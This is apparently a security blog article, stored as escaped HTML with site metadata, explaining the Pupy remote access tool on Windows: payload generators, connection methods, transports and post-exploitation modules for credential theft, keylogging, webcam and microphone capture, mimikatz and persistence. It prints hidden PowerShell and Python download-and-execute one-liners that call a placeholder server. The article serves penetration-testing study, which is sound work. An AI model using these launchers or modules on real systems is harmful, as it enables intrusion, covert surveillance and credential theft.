Installation Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Ch3>1. Using docker\u003C\u002Fh3>\u003Cp>Documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fwiki\u002FInstallation\u003C\u002Fp>\u003Ch3>2. Direct installation\u003C\u002Fh3>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>git clone --recursive https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u003Cbr>cd pupy\u003Cbr>python create-workspace.py -DG pupyws\u003Cbr>pupyws\u002Fbin\u002Fpupysh\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Using the -DG parameter will download template files from https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Freleases\u002Fdownload\u002Flatest\u002Fpayload_templates.txz\u003C\u002Fp>\u003Ch2>0x03 Supported payload file types\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>After starting pupy, enter gen -h to get instructions for generating payload files, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017291528_0_db8aa684db-1.jpeg\">\u003C\u002Fp>\u003Cp>Here is a detailed introduction one by one\u003C\u002Fp>\u003Ch3>1.client\u003C\u002Fh3>\u003Cp>Generate files in EXE format\u003C\u002Fp>\u003Cp>Example command for generating a 64-bit EXE file:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f client -A x64\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command will read the template file from pupy\u002Fpupy\u002Fpayload_templates\u002F, add configuration information, and generate the final EXE file\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The template file name corresponding to the above command is pupyx64.exe. The download link for the template file is: https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Freleases\u002Fdownload\u002Flatest\u002Fpayload_templates.txz\u003C\u002Fp>\u003Ch3>2.py\u003C\u002Fh3>\u003Cp>Generate a fully packaged Python file (all dependencies are packaged and executed from memory)\u003C\u002Fp>\u003Cp>Example command:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f py\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command will generate a Python file with content in the following format:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>import zlib,marshal;exec marshal.loads(zlib.decompress('xxxxxxxxx')\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Where 'xxxxxxxxx' is the encrypted content\u003C\u002Fp>\u003Cp>The encryption method roughly involves serializing the code using marshal.dumps, followed by operations such as offset and XOR. For the specific encryption algorithm, refer to:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fblob\u002F5b9529a0ea07bb4246a57bfb1c1129010c948931\u002Fpupy\u002Fpupylib\u002Futils\u002Fobfuscate.py#L9\u003C\u002Fp>\u003Cp>To cancel the encryption process and obtain the source file, add the --debug parameter. Example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f py --debug\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Corresponding code location: https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fblob\u002F5b9529a0ea07bb4246a57bfb1c1129010c948931\u002Fpupy\u002Fpupylib\u002Fpayloads\u002Fpy_oneliner.py#L43\u003C\u002Fp>\u003Cp>The code logic is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>if debug:\u003Cbr>    return payload\u003Cbr>return compress_encode_obfs(payload, main=True)\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>To run this Python file in a Windows Python environment, the following modules also need to be installed on Windows:\u003C\u002Fp>\u003Cul>\u003Cli>pywin32\u003C\u002Fli>\u003Cli>pycryptodome\u003C\u002Fli>\u003Cli>Crypto\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The Crypto package needs to be downloaded from http:\u002F\u002Fwww.voidspace.org.uk\u002Fpython\u002Fmodules.shtml#pycrypto\u003C\u002Fp>\u003Ch3>3.pyinst\u003C\u002Fh3>\u003Cp>Generate Python files compatible with pyinstaller\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f pyinst\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Difference from gen -f py: adds some header files to facilitate converting Python scripts to exe files using pyinstaller\u003C\u002Fp>\u003Cp>The usage of pyinstaller was introduced in the previous article 'Custom Script Development in Local Password Viewer LaZagne'\u003C\u002Fp>\u003Ch3>4.py_oneliner\u003C\u002Fh3>\u003Cp>Download and execute Python code from a server via the urllib library\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f py_oneliner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output the download and execute code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>python -c 'import urllib;exec urllib.urlopen(\"http:\u002F\u002F192.168.1.1:9000\u002Fa0py9Yz5pi\u002FSg11A11q2J\").read()'\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>5.ps1\u003C\u002Fh3>\u003Cp>Generate startup code in powershell format, which first starts a Powershell process and then loads the dll within the Powershell process\u003C\u002Fp>\u003Cp>Command example for generating 32-bit files:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f ps1\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command reads the DLL template file from pupy\u002Fpupy\u002Fpayload_templates\u002F, adds configuration information and obfuscated Invoke-ReflectivePEInjection code, ultimately achieving DLL loading within the Powershell process.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The corresponding template file name for the above command is pupyx86.dll.\u003C\u002Fp>\u003Ch3>6.ps1_oneliner\u003C\u002Fh3>\u003Cp>Downloads and executes Powershell code from a server via IEX(New-Object Net.WebClient).DownloadString.\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f ps1_oneliner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Outputs the download-and-execute code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell.exe -w hidden -noni -nop -c \"IEX(New-Object Net.WebClient).DownloadString('http:\u002F\u002F192.168.1.1:9000\u002FDfsP5d2GPG\u002FxDrhpNdNTU');\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Outputs the base64-encoded execution code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell.exe -w hidden -noni -nop -enc xxxxxxxxxxxxxxxxxxxx\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>7.rubber_ducky\u003C\u002Fh3>\u003Cp>Generates a Rubber Ducky script and an inject.bin file.\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f rubber_ducky\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>8.csharp\u003C\u002Fh3>\u003Cp>Generate C# file (.cs format)\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f csharp\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command will read the DLL template file from pupy\u002Fpupy\u002Fpayload_templates\u002F, add configuration information, and use Casey Smith's PELoader to load the PE file from memory\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>The corresponding template file name for the above command is pupyx86.dll\u003C\u002Fp>\u003Cp>For compilation and usage methods of the C# file, refer to the previous article 'Loading PE Files from Memory via .NET'\u003C\u002Fp>\u003Ch3>9..NET\u003C\u002Fh3>\u003Cp>Generate C# file (.cs format) and compile it with mono, ultimately producing an exe format file\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f .NET\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Requires installation of the mono development environment; the Kali installation command is apt-get install mono-mcs\u003C\u002Fp>\u003Cp>For usage of mono, refer to the previous article 'Executing Shellcode via Mono (Cross-platform .NET Runtime Environment)'\u003C\u002Fp>\u003Cp>This command adds the functionality of compiling with mono on top of gen -f csharp\u003C\u002Fp>\u003Ch3>10..NET_oneliner\u003C\u002Fh3>\u003Cp>Load .NET assemblies from memory via PowerShell\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>gen -f .NET_oneliner\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Output PowerShell code in the command line, example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>powershell -w hidden -enc \"xxxxxxxxxxxxxx\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>This command adds the functionality of loading .NET assemblies from memory via PowerShell on top of gen -f .NET\u003C\u002Fp>\u003Cp>The implementation code for loading .NET assemblies from memory via PowerShell is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>[Reflection.Assembly]::Load(\"\"(new-object net.webclient).DownloadData(\"\"'http:\u002F\u002F{link_ip}:{port}{landing_uri}')).GetTypes()[0].GetMethods(\"\")[0].Invoke($null,@())\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>The previous article 'Analysis of Exploiting .NET Assembly Loading from Memory (Assembly.Load)' analyzed methods for loading .NET assemblies from memory\u003C\u002Fp>\u003Ch3>Additional: Extra parameters\u003C\u002Fh3>\u003Cp>For the generated launcher files, the following parameters are also supported:\u003C\u002Fp>\u003Cul>\u003Cli>Whether to compress\u003C\u002Fli>\u003Cli>Whether to use system proxy\u003C\u002Fli>\u003Cli>Set connection count and interval time\u003C\u002Fli>\u003Cli>Set Python script to execute before startup\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x04 Supported Connection Methods\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>The following four types are supported:\u003C\u002Fp>\u003Cul>\u003Cli>bind, bind port, used as a forward connection\u003C\u002Fli>\u003Cli>auto_proxy, retrieve possible SOCKS\u002FHTTP proxy lists and use them, retrieval methods include: registry, WPAD request, gnome settings, environment variable HTTP_PROXY\u003C\u002Fli>\u003Cli>dnscnc, DNS protocol? (This feature is currently untestable)\u003C\u002Fli>\u003Cli>connect, default method, reverse connect to server\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x05 Supported Communication Protocols\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Obtain list via command gen -l\u003C\u002Fp>\u003Cp>Documentation:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002Fn1nj4sec\u002Fpupy\u002Fwiki\u002FGet-Started#transport\u003C\u002Fp>\u003Cp>Currently supports the following categories:\u003C\u002Fp>\u003Cul>\u003Cli>obfs3\u003C\u002Fli>\u003Cli>http\u003C\u002Fli>\u003Cli>ssl\u003C\u002Fli>\u003Cli>ecm\u003C\u002Fli>\u003Cli>tcp_cleartext\u003C\u002Fli>\u003Cli>dfws\u003C\u002Fli>\u003Cli>rsa\u003C\u002Fli>\u003Cli>udp_secure\u003C\u002Fli>\u003Cli>kc4\u003C\u002Fli>\u003Cli>ec4\u003C\u002Fli>\u003Cli>ws\u003C\u002Fli>\u003Cli>scramblesuit\u003C\u002Fli>\u003Cli>udp_cleartext\u003C\u002Fli>\u003Cli>ssl_rsa\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Communication protocols of the above categories can be customized, modification location: pupy\u002Fpupy\u002Fnetwork\u002Ftransports\u002F\u003Ctransport_name>\u002Fconf.py\u003C\u002Ftransport_name>\u003C\u002Fp>\u003Ch2>0x06 Post-Exploitation Module Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Common Commands:\u003C\u002Fp>\u003Cp>Set listening port: listen -a ssl 8443\u003C\u002Fp>\u003Cp>View sessions: sessions\u003C\u002Fp>\u003Cp>Switch session: sessions -i \u003Cid>\u003C\u002Fid>\u003C\u002Fp>\u003Cp>Terminate session: sessions -k \u003Cid>\u003C\u002Fid>\u003C\u002Fp>\u003Cp>Usage example as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017322122_1_72a62add13-1.jpeg\">\u003C\u002Fp>\u003Cp>After obtaining a session, enter help -M to display supported post-exploitation modules. Here, these modules are categorized and their functions introduced one by one\u003C\u002Fp>\u003Ch3>1. Privilege Escalation\u003C\u002Fh3>\u003Cp>(1) Use beroot to obtain information for privilege escalation, module: beroot\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002FAlessandroZ\u002FBeRoot\u003C\u002Fp>\u003Cp>(2) Use WinPwnage to attempt privilege escalation, module: bypassuac\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002Frootm0s\u002FWinPwnage\u003C\u002Fp>\u003Cp>(3) Switch to SYSTEM privileges, module: getsystem\u003C\u002Fp>\u003Cp>(4) Use Windows PowerShell ADIDNS\u002FLLMNR\u002FmDNS\u002FNBNS spoofer\u002Fman-in-the-middle tool Inveigh, module: inveigh\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002FKevin-Robertson\u002FInveigh\u003C\u002Fp>\u003Ch3>2. Processes\u003C\u002Fh3>\u003Cp>(1) List\u002Fimpersonate process tokens, module: impersonate\u003C\u002Fp>\u003Cp>For token exploitation methods, refer to the previous article 'Penetration Techniques - Token Theft and Exploitation'\u003C\u002Fp>\u003Cp>(2) Obtain current privileges, module: getprivs\u003C\u002Fp>\u003Cp>For privilege exploitation methods, refer to the previous article 'Penetration Techniques - Exploitation of Nine Windows Privileges'\u003C\u002Fp>\u003Cp>(3) Obtain the parent process of the current process, module: getppid\u003C\u002Fp>\u003Cp>For privilege switching via parent processes, refer to the previous article 'Penetration Techniques - Switching from Admin to System Privileges'\u003C\u002Fp>\u003Ch3>3. Credential Acquisition\u003C\u002Fh3>\u003Cp>(1) Use Lazagne to obtain credentials, module: lazagne\u003C\u002Fp>\u003Cp>Source code address: https:\u002F\u002Fgithub.com\u002FAlessandroZ\u002FLaZagne\u002F\u003C\u002Fp>\u003Cp>The previous article 'Custom Script Development in the Local Password Viewer Tool LaZagne' introduced LaZagne\u003C\u002Fp>\u003Cp>(2) Export local user hashes from the registry, module: creddump\u003C\u002Fp>\u003Cp>For related details, you can refer to the previous article 'Penetration Techniques - Obtaining Local User Hashes via the SAM Database'.\u003C\u002Fp>\u003Cp>(3) Monitor memory and search for plaintext credentials, module: loot_memory\u003C\u002Fp>\u003Cp>Once enabled, it will continuously monitor memory.\u003C\u002Fp>\u003Cp>(4) Dump printable strings from process memory for further analysis, module: memstrings\u003C\u002Fp>\u003Cp>Can target specified processes; output format is a text file.\u003C\u002Fp>\u003Ch3>4. Network-related\u003C\u002Fh3>\u003Cp>(1) Send Get\u002FPost requests via HTTP protocol, module: http\u003C\u002Fp>\u003Cp>(2) TCP port scanning, module: port_scan\u003C\u002Fp>\u003Cp>(3) Port forwarding and SOCKS proxy, module: forward\u003C\u002Fp>\u003Cp>(4) Packet capture, module: tcpdump\u003C\u002Fp>\u003Cp>(5) UPnP operations, module: igd\u003C\u002Fp>\u003Cp>(6) Obtain certificates from servers, module: x509\u003C\u002Fp>\u003Ch3>5. Screen control\u003C\u002Fh3>\u003Cp>(1) Module for controlling the target screen via a browser: rdesktop\u003C\u002Fp>\u003Cp>After loading, you can control the target's screen through a browser, as shown in the figure below.\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017371161_2_d40bdf2647-1.jpeg\">\u003C\u002Fp>\u003Cp>Not only can view screen content, but also send mouse and keyboard messages\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Remote Desktop Protocol (RDP) is not used here\u003C\u002Fp>\u003Cp>(2) Using Remote Desktop Protocol (RDP), module: rdp\u003C\u002Fp>\u003Cp>Can be used to enable or disable remote desktop connections, and also supports verifying credentials of remote hosts\u003C\u002Fp>\u003Ch3>6. Monitoring\u003C\u002Fh3>\u003Cp>(1) Keyboard and clipboard logging, module: keylogger\u003C\u002Fp>\u003Cp>(2) Record mouse clicks and capture surrounding areas, module: mouselogger\u003C\u002Fp>\u003Cp>(3) Screenshot, module: screenshot\u003C\u002Fp>\u003Cp>(4) Microphone recording, module: record_mic\u003C\u002Fp>\u003Cp>(5) Webcam capture, module: webcamsnap\u003C\u002Fp>\u003Ch3>7. Obtain system information\u003C\u002Fh3>\u003Cp>(1) View logs, module: logs\u003C\u002Fp>\u003Cp>Different types correspond to different colors, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017394493_3_28feb5695b-1.jpeg\">\u003C\u002Fp>\u003Cp>(2) Registry, module: reg\u003C\u002Fp>\u003Cp>Includes query, add, delete, modify, and search operations\u003C\u002Fp>\u003Cp>Different types correspond to different colors, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017437243_4_0c6fa9f635-1.jpeg\">\u003C\u002Fp>\u003Cp>(3) List local and remote shared folders and permissions, module: shares\u003C\u002Fp>\u003Cp>(4) View currently logged-in users, module: w\u003C\u002Fp>\u003Cp>(5) Retrieve service information, module: services\u003C\u002Fp>\u003Cp>(6) Get time, module: date\u003C\u002Fp>\u003Cp>(7) Retrieve EC2\u002FDigitalOcean metadata, module: cloudinfo\u003C\u002Fp>\u003Cp>(8) View and modify environment variables, module: env\u003C\u002Fp>\u003Cp>(9) Virtual machine detection, module: check_vm\u003C\u002Fp>\u003Cp>Supports identification of the following virtual machines:\u003C\u002Fp>\u003Cul>\u003Cli>Hyper-V\u003C\u002Fli>\u003Cli>VMWare\u003C\u002Fli>\u003Cli>Virtual PC\u003C\u002Fli>\u003Cli>Virtual Box\u003C\u002Fli>\u003Cli>Xen Machine\u003C\u002Fli>\u003Cli>Qemu machine\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Identification method: Query the registry\u003C\u002Fp>\u003Ch3>8. Execute Python commands\u003C\u002Fh3>\u003Cp>(1) Execute a single command, module: pyexec\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pyexec -c \"import platform;print platform.uname()\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Execute Python commands in an interactive shell, module: pyshell\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pyshell\u003Cbr>import platform\u003Cbr>print platform.uname()\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Load Python package, module: load_package\u003C\u002Fp>\u003Ch3>9. Execute CMD Commands\u003C\u002Fh3>\u003Cp>(1) Execute CMD commands via subprocess, module: shell_exec\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>shell_exec whoami\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(2) Simple popen call executed on a thread (slower but safer), module: pexec\u003C\u002Fp>\u003Cp>Command example:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>pexec whoami\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>(3) Interactive shell, module: interactive_shell\u003C\u002Fp>\u003Cp>Modified from winpty\u003C\u002Fp>\u003Cp>(4) Execute shellcode, module: shellcode_exec\u003C\u002Fp>\u003Cp>(5) Execute file in memory, module: memory_exec\u003C\u002Fp>\u003Ch3>10. Execute CMD Commands Remotely\u003C\u002Fh3>\u003Cp>Use smbexec\u002Fwmiexec to achieve remote command execution, module: psexec\u003C\u002Fp>\u003Cp>Supports using hash\u003C\u002Fp>\u003Ch3>11. Maintain Persistence\u003C\u002Fh3>\u003Cp>(1) Persistence, module: persistence\u003C\u002Fp>\u003Cp>For more methods, refer to: an open-source project\u003C\u002Fp>\u003Cp>(2) Duplicate current session, module: duplicate\u003C\u002Fp>\u003Cp>(3) Process migration, module: migrate\u003C\u002Fp>\u003Ch3>12. mimikatz\u003C\u002Fh3>\u003Cp>(1) Load mimikatz in memory, execute single command, module: mimikatz\u003C\u002Fp>\u003Cp>(2) Load mimikatz in memory, interactive, module: mimishell\u003C\u002Fp>\u003Ch3>13. powerview\u003C\u002Fh3>\u003Cp>(1) Direct invocation, module: powerview\u003C\u002Fp>\u003Cp>(2) Rewritten in Python, module: pywerview\u003C\u002Fp>\u003Ch3>14. File operations\u003C\u002Fh3>\u003Cp>(1) Upload, module: upload\u003C\u002Fp>\u003Cp>(2) Download, module: download\u003C\u002Fp>\u003Cp>(3) View file or folder attributes, module: stat\u003C\u002Fp>\u003Cp>(4) Edit file, module: edit\u003C\u002Fp>\u003Cp>(5) Write to file, module: write\u003C\u002Fp>\u003Cp>(6) Search files using Windows Search Index, module: isearch\u003C\u002Fp>\u003Cp>(7) Search for characters in all files under a specified directory, module: search\u003C\u002Fp>\u003Cp>(8) Access file shares via SMB protocol, module: smb\u003C\u002Fp>\u003Cp>(9) Connect to remote shared directory and search for files, module: smbspider\u003C\u002Fp>\u003Ch3>15. SSH client\u003C\u002Fh3>\u003Cp>(1) Connect to remote SSH server and execute commands, module: ssh\u003C\u002Fp>\u003Cp>(2) Connect to remote SSH server for a full interactive session, module: sshell\u003C\u002Fp>\u003Ch3>16. Outlook\u003C\u002Fh3>\u003Cp>Interact with the target user's Outlook session, module: outlook\u003C\u002Fp>\u003Ch3>17. Compression and decompression\u003C\u002Fh3>\u003Cp>Zip compression and decompression, module: zip\u003C\u002Fp>\u003Ch3>18. Lock screen\u003C\u002Fh3>\u003Cp>Module: lock_screen\u003C\u002Fp>\u003Ch3>19. View information of the connected back session\u003C\u002Fh3>\u003Cp>(1) Obtain network information for all sessions, module: netstat\u003C\u002Fp>\u003Cp>(2) Obtain information for the current session, module: get_info\u003C\u002Fp>\u003Cp>(3) View acquired credential information, command: creds\u003C\u002Fp>\u003Cp>(4) View server configuration information, command: config\u003C\u002Fp>\u003Ch2>0x07 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the startup file types, connection methods, and communication protocols of Pupy on the Windows platform, categorizes its post-exploitation modules, and describes the functionality of each one.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1241,"Onedaysec",8,"published","2026-02-02T07:51:00.264Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Pupy Exploitation Analysis: Windows Features & Payloads","Pupy exploitation, Windows post-exploitation, payload generation, remote administration tool, Python RAT",null,false,[],{"docs":43,"hasNextPage":40},[44,45,46,47,4],411,410,409,408,{"title":39,"description":39,"image":39},"2026-07-24T15:37:13.573Z","2026-07-23T16:01:31.087Z","draft","2026-07-23T16:05:59.913Z"]